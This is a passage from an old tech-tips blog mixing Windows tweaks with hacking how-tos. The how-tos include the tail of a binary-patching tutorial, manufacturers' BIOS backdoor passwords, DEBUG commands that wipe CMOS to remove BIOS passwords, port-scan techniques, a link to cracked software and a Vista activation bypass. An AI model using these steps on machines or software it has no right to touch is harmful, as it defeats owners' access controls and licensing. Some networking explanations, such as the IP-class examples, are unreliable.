Now right click and go to Copy to executable -> All Modifications.

On the window that appears select:

Copy All

A new window will appear. Click yes to save modifications. Save as a different name.

Now press Run (the play button at the top of Olly). The Message Box should have appeared and then Winmine.

It is all how it works ,if u people also intrested in dynamic dll injection then plz comment in this post

credits-ECE,MICROSOFT

IP address explained

2008-10-27T17:49:00.001-07:00

Every system connected to the Internet or connected to a particular network has a unique Internet Protocol Address of an IP Address. Just as in the real world every person has his or her own Home Contact Address, similarly every system connected to the Internet has its own unique IP Address. Your IP Address is the address to which data should be sent to ensure that it reaches your system. The IP Address of a system acts as the system’s unique identity on the net.

An Internet Protocol Address (IP Address) is a 32-bit address or number, which is normally written as four decimal numbers (of 8 bits each) , each separated from the other by a decimal.. This standard is known as the dotted-decimal notation.

Example: A Typical IP Address would be as follows: 202.34.12.23

It can be further broken down as:

202 representing the first 8-bits.

34 representing the next 8-bits.

12 representing the third 8-bits.

23 representing the fourth 8-bits.

Thus when considered together 202.34.12.23 represents 32-bits. So basically we can conclude that each decimal in an IP Address represents 1 byte or 8 bits. It is important to note than an IP Address can contain numbers from 0-255.

There are a huge number of IP Addresses in use in the present day . All these IP Addresses have some sort of relation with each other and each individual IP Address can reveal a lot of secrets about the Network, of which it is a part. Before we move on to that, we need to understand the fact that all IP Addresses being used are divided into a number of ranges, which are as follows:

Class Range

A 0.0.0.0 to 127.255.255.255

B 128.0.0.0 to 191.255.255.255

C 192.0.0.0 to 223.255.255.255

D 224.0.0.0 to 239.255.255.255

E 240.0.0.0 to 247.255.255.255

So, we can easily conclude that one can find out the Class to which an IP Address belongs to simply by comparing the numeral before the first decimal of the IP Address with the above table.

For Example: In The IP Address 203.43.21.12, the number before the first decimal is 203 and the above table tells us that it belongs to Class C of the range of IP addresses

The various IP Addresses are divided into the different classes on the basis of the structure of their Network or in other words on the basis of what the various numbers separated by decimals actually stand for. To understand this, let us refer to the following:

Class Information

A It has the first 8-Bits for Netid and the last 24-bits for Hostid

B It has the first 16-Bits for Netid and the last 16-bits for Hostid

C It has the first 24-Bits for Netid and the last 8-bits for Hostid

D It represents a 32-bit multicast Group ID.

E Currently not being used.

The above table will be clearer after reading the following examples:

Examples:

An IP Address 203.45.12.34 belonging to Class A means that the network ID is 203 and the host ID is 45.12.34

If the Same IP Address belonged to Class B, then the network ID would become 203.45 and the host ID would become 12.34

And if it belonged to Class C then the network ID would become 203.45.12 and the host ID would become 34.

Almost all ISP’s prefer to use a Class B Network and some may use class C network. If that is the case then each time you login to your ISP, then the first 2 octets of your IP Address would not change, while the last two are likely to change. However, even if only the last octet changes, and the remaining three remain constant, it is likely that the ISP uses Class B addressing.

An IP Address, which belongs to the Class-A addressing system having a network ID equal to 127, is referred to as the special address. It is actually known as the Loopback Interface. It allows clients and servers on the same system to communicate with each other.

The loopback address, which is commonly used, is 127.0.0.1. Almost all systems have also given the loopback address the special name ‘localhost’.

An IP Address does not necessarily have to be represented in the dotted decimal form. There is more than a single way in which one can represent an IP Address. Some of there are as follows-:

1. Decimal System: If an IP Address is being represented in the Decimal system, then it means that it is being represented in the Base 10 system. The normal IP Addresses are represented in the Decimal System. Example: 216.115.108.245

2. Domain Name System: If an IP Address is being represented in the form of human recognizable characters and names then it is said to be in the form of DNS system. Example: www.yahoo.com

3. DWORD Format: DWORD is short for double word. It basically consists of two binary
“words” (or lengths) of 16 bits. However, it is almost always represented in the decimal number system i.e. having a base 10. Example: D8736CF5, which when represented in the form of a decimal number system with a Base 10 becomes 3631443189

4. Octal System: If an IP Address is represented in the octal system, then it means that it is being represented in the Base 8. Example: 33034666365

5. Hexadecimal System: If an IP Address is represented in the Hexadecimal System, then it is actually being represented in the Base 16 system.

6. A Cross Breed: If an IP Address is being represented in the mixture of any of the above two systems, then it is said to be a Cross Breed.

All the examples portrayed above are some form or the other of the same address of the same system. What I mean to say by this is that typing any of the following in your browser will take you to the same site

hacking bios

2008-10-27T17:45:00.001-07:00

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard
manufacturer’s backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256,
j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER,
SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA,
ZAAADA, ZJAAADC, djonet,
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj,phonix,toshiba

remember that passwords are Case Sensitive.

hacking BIOS via software

If you have access to the computer when it’s turned on, you could try one of those
programs that remove the password from the BIOS, by invalidating its memory.

However, it might happen you don’t have one of those programs when you have access
to the computer, so you’d better learn how to do manually what they do. You can reset
the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the
command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell
window in Windows). Once you are in the debug environment enter the following
commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q

PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don’t have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a “O” not the number “0″. The numbers which follow are two
bytes in hex format.

Hacking BIOS via hardware
If you can’t access the computer when it’s on, and the standard backdoor passwords
didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes
at the end of this section before to try any of these methods.

Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper
on the motherboard (for “switching a jumper” I mean that you find a jumper that joins
the central pin and a side pin of a group of three pins, you should then unplug the
jumper and then plug it to the central pin and to the pin on the opposite side, so if the
jumper is normally on position 1-2, you have to put it on position 2-3, or viceversa).
This jumper is not always located near to the BIOS, but could be anywhere on the
motherboard.
To find the correct jumper you should read the motherboard’s manual.Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from
what the manual says) while the computer is turned OFF. Wait a couple of seconds then
put the jumper back to its original position. In some motherboards it may happen that
the computer will automatically turn itself on, after flashing the BIOS. In this case, turn
it off, and put the jumper back to its original position, then turn it on again. Other
motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don’t have the motherboard’s manual, you’ll have to “bruteforce” it… trying out all
the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the
BIOS, and the ones you can switch (as I explained before). If all them fail, try all the
others. However, you must modify the status of only one jumper per attempt, otherwise
you could damage the motherboard (since you don’t know what the jumper you
modified is actually meant for). If the password request screen still appear, try another
one.
If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and
wait some seconds before to retry.

Removing the battery
If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can
remove the battery that keeps the BIOS memory alive. It’s a button-size battery
somewhere on the motherboard (on elder computers the battery could be a small,
typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side
to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it
away for 15-30 minutes or more, then put it back and the data contained into the BIOS
memory should be volatilized. I’d suggest you to remove it for about one hour to be
sure, because if you put it back when the data aren’t erased yet you’ll have to wait more
time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery
overnight.

Important note: in laptop and notebooks you don’t have to remove the computer’s power
batteries (which would be useless), but you should open your computer and remove the
CMOS battery from the motherboard.

Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the
BIOS chip for a few seconds. You can do that with a small piece of electric wire or with
a bended paper clip. Always make sure that the computer is turned OFF before to try
this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may
find similar chips with different names if they are compatible chips made by another
brand. If you find the BIOS chip you are working on matches with one of the following
you can try to short-cicuit the appropriate pins. Be careful, because this operation may
damage the chip.

Important
Whether is the method you use, when you flash the BIOS not only the password, but
also all the other configuration data will be reset to the factory defaults, so when you are
booting for the first time after a BIOS flash, you should enter the CMOS configuration
menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of
the new configuration of the BIOS, in this case you’ll probably need the Windows
installation CD because Windows may ask you for some external files. If Windows
doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t
find the CD-ROM drive and you set it properly from the BIOS config, just reboot with
the reset key, and in the next run Windows should find it. However most files needed by
the system while installing new hardware could also be found in C:\WINDOWS,
C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF .

change C with your windows drive letter if it is not in C drive

port scanning technique

2008-10-27T17:44:00.000-07:00

Port Scanning: Port scanning is the process of connecting to TCP and UDP ports on a target system to determined what services are running or in a LISTENING state. Identifying listening ports is critical to determine the type of operating system and applications in use. Active services that are listening may allow an unauthorized user to gain access to systems that are misconfigured or running a version of software known to have security vulnerabilities.

Different Port Scanning Types

CP Connect Scan – This type of scan connects to the target port and completes a full three way handshake (SYN, SYN / ACK, and ACK). It’s easily detected by the target system

TCP SYN Scan – This technique is called half one scanning because a full TCP connection is not made. Instead a SYN packet is sent to the target port. If a (SYN / ACK) is received from the target port, we can deduce that it is in the LISTENING state. If an (RST / ACK) is received, it usually means that the port is not in the LISTENING state. An (RST / ACK) will be sent by the systems performing port scans so that a full connection is never established. This technique has the advantage of being stealthier than a Full TCP Connect is, and may not be logged by the target systems.

TCP FIN Scan – This technique send a FIN packet to the target port. The target system should send back an RST for all closed ports. This technique usually only works on a UNIX based (TCP / IP) stack.

TCP Xmas Tree Scan – This technique send a FIN, URG, and PUSH packet to the target port. Based on RFC 793, the target system should send back an RST for all closed ports.

TCP Null Scan – This technique turns off all flags. Based on RFC 793, the target system should send back an RST for all closed Ports.

TCP ACK Scan – This technique is used to map out firewall rulesets. It can help determine if the firewall is a simple packet filter allowing only established connections (Connections with an ACK bit site) or a stateful firewall that is performing advance packet filtering.

TCP Window Scan – This technique may detect open as well as filtered nonfiltered ports on some systems (AIX and FreeBSD) due to an anomaly in the way the TCP window size is reported.

TCP RPC Scan – This technique is specific for UNIX systems and is used to detect and identify Report Procedure (RPC) ports and their associated program and version numbers.

UDP Scan – This technique sends a UDP packet to the target port. If the target port responds with an “ICMP port unreachable” message, the port is closed. Conversely, if we don’t receive an “ICMP port unreachable” message, we can deduce the port is open. Since UDP is known as a connectionless protocol, the accuracy of this technique is highly depend on many factors related to the utilization’s of network and system resources. In addition UDP scanning is a very slow process if you are trying to scan a device that employs heavy packet filtering. If you plan on doing UDP scans over the Internet be ready for unreliable results.

Active Stack Fingerprinting: Stack fingerprinting is an extremely powerful technology that allows you to quickly ascertains each host operation system with a high degree of probability. Essentially, there are many nuances that very between one venders Internet protocol (IP) stack implementation and another’s. Vendors often interpret specific RFC guidance differently when writing there TCP / IP stack. Thus by probing for these differences, we can begin to make an educated guess about the operating system in use. For maximum reliability, stack fingerprinting generally requires at least one listen port.

Passive Stack Fingerprinting: Passive stack fingerprinting is similar in concept to active stack fingerprinting. Instead of sending packets to the target system, however, an attacker passively monitors the network traffic to determine the operating system in use. Thus, by monitoring network traffic between various systems, we can determine the operating systems on a network

Passive Signatures: Various signatures can be used to identify an operating system. Below are several associated with a TCP / IP session.

some terms used in port scanning

FIN Probe – A Find packet is sent to an open port. As mentioned RFC 793 states that the correct behavior is not to respond. However many stack implements (Such As Windows NT) will respond with as FIN/ACK.

Bogus Flag Probe – An undefined TCP flag is set in the TCP Header of a SYN packet. Some operating systems such as (Linux) will respond with the flag set in there respond packet.

Initial Sequence Number (ISN) Sampling – The basics premise is to find a pattern in the initial sequence chose by the TCP implementation when responding to a connection request.

Don’t Fragment Bit Monitoring – Some operation systems will set the “Don’t Fragment Bit” to enhance performance. This bit can be monitored to determine what types of operation systems exhibit this behavior.

TCP Initial Window Size – Initial window size on returned packets is tracked. For some stack implementations, this size is unique and can be greatly added tot he accuracy of the fingering mechanism.

ACK Value – Internet Protocols (IP) stacks differ in the sequence value used for the ACK field, so some implementations will send back the sequences number you sent, and others will send back a sequence number +1.

ICMP Error Message Quenching – Operating system may follow RFC 1812 and limit rate at which error messages are sent. By sending UDP packets to some random high numbered ports, you can count the number of unreachable messages received within a given amount of time.

ICMP Message Quoting – Operating systems differ in the amount of information that is quoted when ICMP errors are encountered. By examining the quoted message, you might be able to make some assumptions on the target operating system.

Type Of Service (TOS) – For “ICMP port unreachable” messages, the TOS is examined. Most stack implementations use 0,but this can vary.

Fragmentation Handling – Different stacks handle overlapping fragments differently. Some stacks will overwrite the old data with new data and vice versa.

TCP Options – By sending a packet with multiple options set, such as no operation, maximum segment size, window scale factor and timestamps, it is possible to make some assumptions about the target system.

write a cd more than 700 mb

2008-08-05T11:17:00.002-07:00

Start Nero

From the action-bar select File and select Preferences.

In the Preferences window, select Expert Features(1) and check the Enable overburn disc-at-once(2).

Choose a Maximum CD Length(3) and click OK(4) (*82:59:59 is the maximum value I suggest,

For a more accurate test you can use a nero tool called nero speed test to see how much a specific CD is capable of being over burned . get it here

From the action-bar select File and select Write CD.

A window will appear when you have exceeded expected length, click OK to start the overburn copy.

Remember to set disk to burn Disc at Once, you cannot overburn in Track at Once Mode.

how to remove extra os from boot menu

2008-08-05T11:17:00.001-07:00

If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.

1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
-or-
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"

stream audio

2008-08-05T11:16:00.002-07:00

How Download MP3s from any Streaming Audio/Video Page

Part1

1- Download “CoCSoft Stream Down” here:

http:// www. ddl2.com/download-CoCsoft-StreamDown-v6.0-full-version-with-crack-serial-keygen-268919. html

remove spaces

2- Go to any other Streaming Audio/Video Page (like MTV or VH1) search
for your Artist or Band, and play your song, a pop up will appear, with a
windows player preview, then, right clic on this player, and click on “properties”

3- Will appear a options,stay in “File” tag, go down to “Location” Select all the link address and copy

4- Go to “CoCSoft Stream Down” program, and click on “ADD” icon, and paste the link address, that u copied on the page, choose your directory to download, and clic in Ok

5- Now, You are downloading the .ASF File

6-use any converter to convert asf file to mp3

how long have been your xp is running

2008-08-05T11:16:00.001-07:00

How Long Has Your System Been Running?

Here's how you verify system uptime:

Click Start | Run and type cmd to open a command prompt.
At the prompt, type systeminfo

Scroll down the list of information to the line that says System Up Time.

This will tell you in days, hours, minutes and seconds how long the system has been up.

Note that this command only works in XP Pro, not in XP Home. You can, however, type net statistics workstation at the prompt in Home. The first line will tell you the day and time that the system came online.

boot xp faster

2008-08-05T11:14:00.000-07:00

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance.

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

WindowsXP should now boot REALLY faster.

remove autorun.inf virus without any antivirus

2007-12-27T22:33:00.000-08:00

so i will tell u how to remove autorun.inf virus which is cause of opening
of your drives in seprate window when u click on the drive name in my computer

There is a trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses those two files. Here is how you can get rid of them:

1) Open up Task Manager (Ctrl-Alt-Del)
2) If wscript.exe is running, end it.
3) If explorer.exe is running, end it.
4) Open up “File | New Task (Run)” in the Task manager
5) Run cmd
6) Run the following command on all your drives by replacing c:\ with other drives in turn (note: if you have autorun.inf files that you think you need to backup, do so now):e.g->del d:\autorun.* /f/a/s/q and other drive names

del c:\autorun.* /f /a /s /q
be extra careful with this command it can delete your all data one by one from your hdd if execute wrongly so place your mouse on x position of cmd prompt windows and if it starts deleting your files close it

7) Go to your Windows\System32 directory by typing cd c:\windows\system32
8) Type dir /a avp*.*
9) If you see any files names avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:

attrib -r -s -h avpo.exe
del avpo.exe

10) Use the Task Manager’s Run command to fire up regedit
11) Navigate to HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (as usual, take a backup of your registry before touching it!)
12) If there are any entries for avpo.exe, delete them.
13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.
14) Restart your computer.

Fixing Corrupt Registry

2007-11-22T17:59:00.000-08:00

If your registry has gotten corrupted, and re-installing Windows95 over your existing
version does not fix the problem,
there is a hidden, read-only, system file on the root of your boot drive called
SYSTEM.1ST.
This is the initial system registry created when you first installed Windows95.
To use this file:
Go to your Windows directory
Un-Attrib your current SYSTEM.DAT file (attrib -r -s -h system.dat)
Copy your current SYSTEM.DAT to something like SYSTEM.BAD file (just in case)
Move to your root directory
Un-Attrib the SYSTEM.1ST file
Copy SYSTEM.1ST to \WINDOWS\SYSTEM.DAT
Re-start your system
You will need to install your 32-bit apps and any other programs or changes that
modified your system registry
but you will not need to go through a new again. Your 16-bit apps should not need to be
re-installed since they do
not modify the registry. You will also retain your current desktop configuration

Removing Open, Explore & Find from Start

2007-11-22T17:58:00.000-08:00

When you right click on the Start Button, you can select Open, Explore or Find.
Open shows your Programs folder. Explore starts the Explorer and allows access to all
drives.
Find allows you to search and then run programs. In certain situations you might want to
disable this feature.
To remove them:
Start Regedit
Search for Directory
This should bring you to Hkey_Classes_Root \ Directory
Expand this section by clicking on the "+"
Under shell is Find
Delete Find
Scroll down below Directory to Folder
Expand this section under shell
Delete Explore and Open
Note: - When you remove Open, you cannot open any folders.
If you need to undo any of the changes, you can download the registry settings before the
changes.

backup your registry

2007-11-22T17:56:00.000-08:00

Introduction
Registry Editor is an advanced tool for viewing and changing settings in your system
registry, which contains information about how your computer runs. Almost the entire
settings are stored in the registry. For example, when you resize an application window,
the window position (x,y points) is stored in the registry so that the settings are retained
permanently. This is just an example, there are much more data stored in the registry,
right from your user account names and passwords (if configured to store in the registry).
Although Registry Editor enables you to inspect and modify the
registry, it's advisable to use Registry Editor only if the GUI does not provide the option
you're looking for. Making incorrect changes in the registry can break your system. It's
highly advisable to backup the registry before editing any portion of it.
Backing up the XP Registry - Three methods
Method 1: Using System Restore
One way to backup the registry is to create a System Restore snapshot. System Restore
returns your computer to a previous snapshot without losing recent personal information,
such as documents, history lists, favorites, or e-mail. It monitors the computer and many
applications for changes and creates restore points. You restore these snapshots when
your configuration isn't working. This method is unreliable in case you want to rollback
the registry changes made a longtime ago, in which case the System Restore might have
purged that particular restore point - due to space constraints or due to a recent system
restore point or even a Restore point corruption. Please remember, System Restore points
get deleted for many reasons, making it unreliable, especially in the long run.
For more help, see : Creating a System Restore point and Using
System Restore to Undo Changes if Problems Occur
Method 2: Backing up the selected branch of the registry by exporting
(Reliable)
This method is preferred if you're making changes to a specific key/area of the registry.
To backup a selected branch/key in the registry, try this:
Click Start, and then click Run.
In the Open box, type regedit, and then click OK
Locate and then click the key that contains the value that you want to edit
On the File menu, click Export.
In the Save in box, select a location where you want to save the Registration Entries
(.reg)
In the File name box, type a file name, and then click Save.
(Backing up a selected branch/key of the registry)
Now that you've created a Registry backup for that particular key. Save the
REG file in a safer location in case you want to undo the registry changes made. You can
restore the settings by just double-clicking the REG file. It automatically merges the
contents to the Registry.
Method 2 (a) : Export registry keys using a command-line (Console Registry Tool)
You can use the Console Registry Tool for Windows (Reg.exe) to edit the registry. For
help with the Reg.exe tool, type reg /? at the Command Prompt, and then click OK.
Example: To export the key [HKEY_CURRENT_USER\Software\IOLO] and
it's sub-keys, try this from Command Prompt:
REG EXPORT HKCU\Software\IOLO C:\IOLO.REG
To view the REG contents type notepad C:\iolo.reg in Start, Run dialog.
Console Registry Tool is extremely handy for network admins and also for home users.

shortcut for restart and shutdown

2007-11-22T17:54:00.000-08:00

This tip will enable you to create buttons in your quick launch toolbar to quickly and
easily shut down and/or restart your computer.
Right click on your desktop, scroll to new..... shortcut
In the location line, for shutdown type; shutdown -s -t 0 ie: shutdown(space)-s(space)-
t(space)number zero
Name the shortcut "Shut Down PC" or whatever u want
The new shortcut is now sitting on your desktop, right click on it and go to properties,
then click on "change icon". Click OK, then pick a suitable icon, there is a red "off
button" icon available, then click apply and ok.
Now drag the icon from your desktop into the quick launch toolbar, resize the toolbar so
all the buttons are visible, then delete the shortcut from your desktop.
To create a restart button the location line should read shutdown -r -t 0 name it restart
pc and give it a suitable icon for restart.
Now you can shut down or restart your pc in 1 mouse click without having to
go through the startup menu.

AUTOSHUTDOWN

2007-11-22T17:51:00.000-08:00

Follow the steps outlined below to schedule automatic regular maintenance of your PC
and then have it shutdown automatically.
Scope:
Windows XP Pro
Installed on C:
NTFS partition
Login as Admin...
1. Open notepad and paste in these lines
cd\
c:
cd windows\system32
defrag c: /f
chkntfs c:
Save the file as maint.bat in the root of C:
2. Open notepad and paste in these lines
[version]
Signature= "$CHICAGO$"
AdvancedINF= 2.5,"advpack.dll"
; This is the install part.
[DefaultInstall]
RunPreSetupCommands=Tst.PreSetup
RunPostSetupCommands=Tst.PostSetup
[Tst.PreSetup]
c:\maint.bat
[Tst.PostSetup]
c:\WINDOWS\SYSTEM32\TSSHUTDN.EXE 0 /DELAY:0 /POWERDOWN
Save the file as maint.inf in the root of C:
3. Open notepad and paste in this line
c:\WINDOWS\System32\rundll32.exe advpack.dll,LaunchINFSectionEx
c:\maint.inf,DefaultInstall,,32
Save the file as shutdown.bat in the root of C:
4. Go to Start/All Programs/Accessories/System Tools/Scheduled Tasks
Add a Scheduled Task
Browse to the C: drive and select shutdown.bat
Select Weekly (change the interval to every 2 weeks)
Set the time for late at night (something like 2am)
5. You can set a 2nd scheduled reminder the night of the maintenance (use a text file with
your reminder words) to remind you to leave your pc turned on. (Just turn off the
monitor).
That's it.
What's going on?
When the scheduled task starts it will execute shutdown.bat. Shutdown.bat will then
execute maint.inf. When maint.inf starts it will execute this section first:
[Tst.PreSetup]
c:\maint.bat
Maint.bat will then execute and defrag the drive. Maint.bat will then execute chkntfs c:
(This will direct XP to run a chkdsk on the NTFS Partition (c:) on the next reboot and fix
any errors automatically. Next, the maint.inf will execute this section:
[Tst.PostSetup]
c:\WINDOWS\SYSTEM32\TSSHUTDN.EXE 0 /DELAY:0 /POWERDOWN
which will then shutdown XP and power off the box.
*Note
When this line chkntfs c: is executed in maint.bat XP will determine if it needs to run on
next boot. If it doesn't you will receive a message that (C: is not dirty). If it needs to run
then a message will appear in the dos window informing you that it will run on next boot.
To visualize what I'm talking about temporarily change the maint.bat to look like this
cd\
c:
cd windows\system32
rem defrag c: /f
chkntfs c:
pause
Execute maint.bat
At any rate, this is just an FYI to clear up any concerns if you don't see chkntfs execute
on the next boot.
Lastly, when this line executes
[Tst.PostSetup]
c:\WINDOWS\SYSTEM32\TSSHUTDN.EXE 0 /DELAY:0 /POWERDOWN
it takes approximately 10-15 seconds before the pc shuts down. So please be patient
when you're testing this out. The delay won't matter as you'll be off in slumberland or
whatever else we do at 2am :)

Removing Multiple Boot Screens:

2007-11-22T17:49:00.000-08:00

If you are getting unwanted multiple boot screenThen Follow these Steps.1> Right Click on My Computer2>Select Properties3>Select Advanced Tab4>Select Settings In the Startup & Recovery Section(3rd grp)5>Select the operating system which u want.6>And Click OK.7>Further again press the setting and click on Edit.8>It will open boot.ini File.9>Now u can delete those o/s which you don't want to be displayed.Note: For deleting operating systems from boot.ini file, keep it mind that you can'tdelete that o/s which is selected by default there. Beforemaking any changes make a copy of boot.ini file.

What Is Wi-Fi ??

2007-11-22T17:45:00.000-08:00

Short for wireless fidelity and is meant to be used generically when referring of any type of 802.11 network, whether 802.11b, 802.11a, 802.11g, dual-band, etc. The term is created by the Wi-Fi Alliance, an organization made up of leading wireless equipment and software providers with the missions of certifying all 802.11-based products for interoperability and promoting the term Wi-Fi as the global brand name across all markets for any 802.11-based wireless LAN products.

While all 802.11a/b/g products are called Wi-Fi, only products that have passed the Wi-Fi Alliance testing are allowed to refer to their products as "Wi-Fi Certified" (a registered trademark). Products that pass are required to carry an identifying seal on their packaging that states "Wi-Fi Certified" and indicates the radio frequency band used (2.5GHz for 802.11b or 11g, 5GHz for 802.11a) This group was formerly known as the Wireless Ethernet Compatibility Alliance (WECA) but changed its name in October 2002 to better reflect the Wi-Fi brand it wants to build.

Wi-Fi is the popular term for a high-frequency wireless local area network (WLAN). The Wi-Fi technology is rapidly gaining acceptance in many companies as an alternative to a wired LAN. It can also be installed for a home network. Wi-Fi is specified in the 802.11b specification from the Institute of Electrical and Electronics Engineers (IEEE) and is part of a series of wireless specifications together with 802.11, 802.11a, and 802.11g. All four standards use the Ethernet protocol and CSMA/CA (carrier sense multiple access with collision avoidance) for path sharing. The 802.11b (Wi-Fi) technology operates in the 2.4 GHz range offering data speeds up to 11 megabits per second. The modulation used in 802.11 has historically been phase-shift keying (PSK). The modulation method selected for 802.11b is known as complementary code keying (CCK), which allows higher data speeds and is less susceptible to multipath-propagation interference.

What Is The Difference Between Gateway And A Wap

2007-11-22T17:44:00.000-08:00

There are two types of Wi-Fi wireless base stations: a gateway and an access point. However, the distinctions between the two are not always clear, in part because the functions they perform can overlap. Even more confusing, many wired devices and other home Internet appliances also call themselves gateways.

A wireless gateway is targeted toward a totally wireless home or small-office environment; an access point is targeted toward a more integrated combined Ethernet and wireless environment-usually - larger businesses, campuses, or corporations. Gateways and access points can also differ regarding their capacity to perform security functions, provide firewall protection, and manage network traffic and tasks.

Gateways often include NAT (Network Address Translation) routing and DHCP (Dynamic Host Control Protocol) services. These create and provide the individual IP addresses all the wireless (and wired) clients need to function in a network and also enable a single Wi-Fi gateway to simultaneously provide Internet access to numerous users from a single shared Internet connection . Gateways may also include other applications and features such as encryption and security, VPN, firewall, and Voice over Internet Protocol (VoIP).

An access point does not usually have NAT routing or DHCP; the wired routers in the system provide those network functions. Access points work as merely transparent bridges between wired networks and the various wireless users throughout a facility. Even though access points generally do not provide NAT or DHCP, they usually enable roaming (the ability to move from one access point to another without losing contact with your network), higher levels of security, and a high level of network control and management. Some gateways also provide these services. In fact, by toggling certain functions on and off, many wireless base stations can operate either as a gateway or as an access point.But a gateway is usually the only wireless base station in a small office or home,

2007-11-22T17:37:00.000-08:00

1)First make sure that you are in the Administrative Mode. Then click on the Start & access Command Promt by typing cmd in the Search Bar.

2)Then type slmgr -rearm in the Command Prompt window & press Enter. After 45 seconds, a prompt will be displayed to Restart your computer. Just Restart, after that you will see that you have successfully extended your activation period to 30 days. This will work only 3 times, so you will get 120 days of Windows Vista without Activation...But we are going to change it.

3)Open Registry Editor by typing regedit in the Search Bar.

4)Navigate to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ Currentversion \ SL.

5)On the right side search for a key called SkipRearm & modify its value to 1.

6)Just close the Registry Editor.

Now the default limit of 3 will be changed to 8 which means that you can use Winodws Vista for 360 Days without Activation.

how to remove unwanted object at start up

2007-11-05T06:02:00.000-08:00

u can do it in many ways permanent and temporary depends upon your requirement
1.hit win+r or simply click on start and click on run now type msconfig you see a window with some tabs go to start up tab and uncheck unwanted entries and press ok and restart the pc and you done
2.go to start ->program->startup and delete unwanted entries
3.at start up press and hold shift button this is temporary

How to overcome downlaoding limitations of rapidshare.com with free account

2007-10-29T11:56:00.000-07:00

As all of us know about the download limitation of rapidshare.com. After downloading one file it says to wait for some time (e.g 10 mins) sometimes this time may be in hours if previous file was little long ;).

This trick works only for those connection that have dynamic IP.

Trick is simple like to make your connection Dial Up rather than always on.
so you need not to power off and on your modem and waste around 2-3 mins each time .
Dial Up connection connects in just seconds almost 1- 5 seconds.

how to make dial Up connection:

step 1.
goto network connection in control panel.

step2.
click on "create a new connection"

A wizard will open

choose "connect to internet" and click next.

choose " setup connection manualy"

if you are a broadband user choose "connect using a braodband connection that require username and password. click next

enter your ISP name or any name that you want ( e.g your name).

click next

Enter user name and password provided by your ISP.
check both boxes that are below

Click ok or done

a icon be created on desktop.
double click on it and click on connect.
when you want to disconnect right click on icon and click on disconnect.
connect and disconnect takes only 1- 2 seconds.

How to speed up mozilla firefox 3-30x times

2007-10-29T11:36:00.000-07:00

1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it recieves.

If you're using a broadband connection you'll load pages 2-30 times faster now.

Using Windows Vista For A Year Without Activation

2007-10-29T10:59:00.000-07:00

